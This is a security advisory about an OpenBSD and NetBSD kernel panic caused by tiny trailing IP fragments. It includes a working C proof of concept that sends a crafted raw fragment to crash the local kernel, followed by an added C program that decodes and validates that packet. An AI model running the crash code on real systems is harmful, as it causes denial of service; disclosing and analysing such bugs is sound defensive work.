COMMAND

    ping

SYSTEMS AFFECTED

    OpenBSD (second-hand confirmation for NetBSD as well)

PROBLEM

    Ficus carica found the following on his OpenBSD-current PPP system:

        ping -s2955 1.2.3.4
    or
        ping -s1455 1.2.3.4

    causes a kernel panic. Thankfully this bug does NOT appear to be
    remotely exploitable. There is second-hand confirmation that this
    problem exists under NetBSD as well.

    Note that it seems that for the commands above to cause a reboot, the
    system must NOT have a default route. This tends to reduce the impact
    of the bug. Note also that the panic does not reproduce in a large
    number of cases, and it is only a bug.

    Anyway, the code follows:

    /* 1-3 bytes of fragment data will cause panic.                       */
    /* ping -pff -s2955 to some interface with an MTU of 1500 bytes       */
    /* will recreate this packet, so it's clearly legal.                  */
    /* If it doesn't work, mail me for the original program.              */
    /* Ficus carica                                                        */

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <string.h>
    #include <unistd.h>

    /* Raw IPv4 datagram: 20-byte header (total length 23, fragment offset
     * 0x172 = 370 * 8 = 2960 bytes, MF clear, proto ICMP, 1.2.3.4 -> 5.6.7.8)
     * followed by three bytes of fragment data. */
    char buf[] =
        "\x45\x00\x00\x17\x02\x7A\x01\x72\xFF\x01\xA7\xE6"
        "\x01\x02\x03\x04\x05\x06\x07\x08\xFF\xFF\xFF";
    /* will not panic with more than three bytes ^^  ^^  ^^ */

    int main(void)
    {
        struct sockaddr_in thesocket;
        int sockd, on = 1;

        memset(&thesocket, 0, sizeof(thesocket));
        thesocket.sin_family = AF_INET;
        thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");

        /* Raw socket with IP_HDRINCL: the kernel takes our header as-is
         * instead of building its own (requires root). */
        sockd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        setsockopt(sockd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on));

        /* sizeof(buf) - 1: do not send the string's null terminator. */
        sendto(sockd, buf, sizeof(buf) - 1, 0x0,
               (struct sockaddr *)&thesocket, sizeof(thesocket));
        close(sockd);
        return 0;
    }

SOLUTION

    The fix should be read as:

    1: chmod a-s /usr/sbin/traceroute /sbin/ping
    2: avoid goofing around with home-made packet fraggers
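The following is an added example and is not part of the advisory or of Ficus carica's program. It decodes the 23-byte fragment embedded in the exploit above, verifies its IPv4 header checksum, flags the condition the advisory describes (a non-first fragment carrying 1-3 bytes of data), and reproduces the size arithmetic behind "ping -s2955 to an interface with an MTU of 1500 bytes". Assumed, not taken from the advisory: a 20-byte IPv4 header without options, an 8-byte ICMP echo header, and the names ipv4_hdr, ipv4_parse, is_tiny_trailing_fragment, last_fragment_len and last_fragment_offset, which are this example's own.

```c
/* Added example (not the advisory's code): decode and check the tiny
 * trailing IPv4 fragment from the OpenBSD ping panic advisory.
 * Assumptions: 20-byte IPv4 header without options, 8-byte ICMP echo header. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The advisory's packet: IPv4 header (20 bytes) + 3 bytes of fragment data. */
static const uint8_t advisory_packet[] = {
    0x45, 0x00, 0x00, 0x17, 0x02, 0x7A, 0x01, 0x72, 0xFF, 0x01, 0xA7, 0xE6,
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0xFF, 0xFF, 0xFF
};

struct ipv4_hdr {
    unsigned version, ihl;     /* ihl in 32-bit words */
    uint16_t total_len, id;
    unsigned flags;            /* bit 2 reserved, bit 1 DF, bit 0 MF */
    unsigned frag_off;         /* in 8-byte units */
    uint8_t ttl, proto;
    uint16_t checksum;
    uint32_t src, dst;
    size_t data_len;           /* payload bytes after the header */
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p) { return ((uint32_t)be16(p) << 16) | be16(p + 2); }

/* RFC 1071 ones-complement checksum over the header, treating the checksum
 * field (bytes 10-11) as zero; returns the value the field should hold. */
uint16_t ipv4_header_checksum(const uint8_t *hdr, size_t hdr_len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < hdr_len; i += 2) {
        if (i == 10) continue;
        sum += be16(hdr + i);
    }
    while (sum >> 16) sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Parse and sanity-check an IPv4 header (length fields and checksum).
 * Returns 0 on success, -1 if the packet is malformed. */
int ipv4_parse(const uint8_t *pkt, size_t len, struct ipv4_hdr *h)
{
    if (len < 20) return -1;
    h->version = pkt[0] >> 4;
    h->ihl = pkt[0] & 0x0F;
    if (h->version != 4 || h->ihl < 5 || (size_t)h->ihl * 4 > len) return -1;
    h->total_len = be16(pkt + 2);
    if (h->total_len < h->ihl * 4 || h->total_len > len) return -1;
    h->id = be16(pkt + 4);
    h->flags = be16(pkt + 6) >> 13;
    h->frag_off = be16(pkt + 6) & 0x1FFF;
    h->ttl = pkt[8];
    h->proto = pkt[9];
    h->checksum = be16(pkt + 10);
    h->src = be32(pkt + 12);
    h->dst = be32(pkt + 16);
    h->data_len = h->total_len - h->ihl * 4;
    if (ipv4_header_checksum(pkt, h->ihl * 4) != h->checksum) return -1;
    return 0;
}

/* The condition in the advisory: a non-first fragment (offset > 0) carrying
 * 1-3 bytes of data. Returns 1 = yes, 0 = no, -1 = not a valid IPv4 packet. */
int is_tiny_trailing_fragment(const uint8_t *pkt, size_t len)
{
    struct ipv4_hdr h;
    if (ipv4_parse(pkt, len, &h) != 0) return -1;
    return h.frag_off > 0 && h.data_len >= 1 && h.data_len <= 3;
}

/* Fragment data per packet on a link of the given MTU: MTU minus the
 * 20-byte header, rounded down to a multiple of 8. */
static size_t frag_unit(size_t mtu) { return (mtu - 20) & ~(size_t)7; }

/* Bytes carried by the final fragment of "ping -s<icmp_data>" over that MTU
 * (the whole payload if it does not need fragmenting). */
size_t last_fragment_len(size_t icmp_data, size_t mtu)
{
    size_t payload = 8 + icmp_data;        /* ICMP echo header + data */
    size_t rem = payload % frag_unit(mtu);
    return rem == 0 ? frag_unit(mtu) : rem;
}

/* Fragment offset (8-byte units) of that final fragment; 0 = not fragmented. */
unsigned last_fragment_offset(size_t icmp_data, size_t mtu)
{
    size_t payload = 8 + icmp_data;
    return (unsigned)((payload - last_fragment_len(icmp_data, mtu)) / 8);
}

int main(void)
{
    struct ipv4_hdr h;
    uint8_t damaged[sizeof advisory_packet];

    if (ipv4_parse(advisory_packet, sizeof advisory_packet, &h) != 0) {
        puts("malformed packet");
        return 1;
    }
    printf("total_len=%u offset=%u (%u bytes) flags=%u data_len=%zu checksum=0x%04X\n",
           h.total_len, h.frag_off, h.frag_off * 8, h.flags, h.data_len, h.checksum);
    printf("tiny trailing fragment: %d\n",
           is_tiny_trailing_fragment(advisory_packet, sizeof advisory_packet));
    printf("ping -s2955 via MTU 1500: last fragment carries %zu bytes at offset %u\n",
           last_fragment_len(2955, 1500), last_fragment_offset(2955, 1500));

    /* Change one header byte (TTL) and the stored checksum no longer matches. */
    memcpy(damaged, advisory_packet, sizeof damaged);
    damaged[8] = 0x40;
    printf("damaged copy parses: %d\n", ipv4_parse(damaged, sizeof damaged, &h));
    return 0;
}
```

With those assumptions the arithmetic lines up with the exploit's bytes: 8 + 2955 = 2963 payload bytes split into 1480-byte fragments leaves exactly 3 bytes in a final fragment at offset 370 (0x172), which is the offset in the packet, and the header checksum recomputes to 0xA7E6. last_fragment_offset returning 0 means the datagram is not fragmented at that MTU, so check against the actual link MTU when trying other sizes.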